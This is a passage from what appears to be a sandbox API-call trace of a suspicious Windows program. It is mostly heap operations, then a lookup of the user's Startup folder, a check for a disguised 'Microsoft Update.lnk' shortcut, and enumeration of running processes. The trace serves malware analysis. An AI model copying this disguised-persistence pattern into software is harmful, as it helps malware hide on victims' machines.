(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0300.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0300.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0300.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0300.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0300.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0300.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0300.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0300.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0300.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0300.173] FreeLibrary (hLibModule=0x74f40000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0300.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0300.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0300.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0300.175] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0300.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0300.175] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0300.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0300.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0300.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0300.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0300.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0300.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0300.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0300.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0300.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0300.177] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0300.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0300.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0300.178] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0300.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0300.178] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0300.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0300.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0300.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0300.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0300.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0300.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0300.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0300.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0300.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0300.179] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0300.180] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0300.180] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0300.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0300.182] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.182] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.183] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.184] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.184] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0300.185] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.185] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0300.186] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0300.187] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0300.187] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0300.188] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.189] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.189] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.190] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.191] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.200] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, 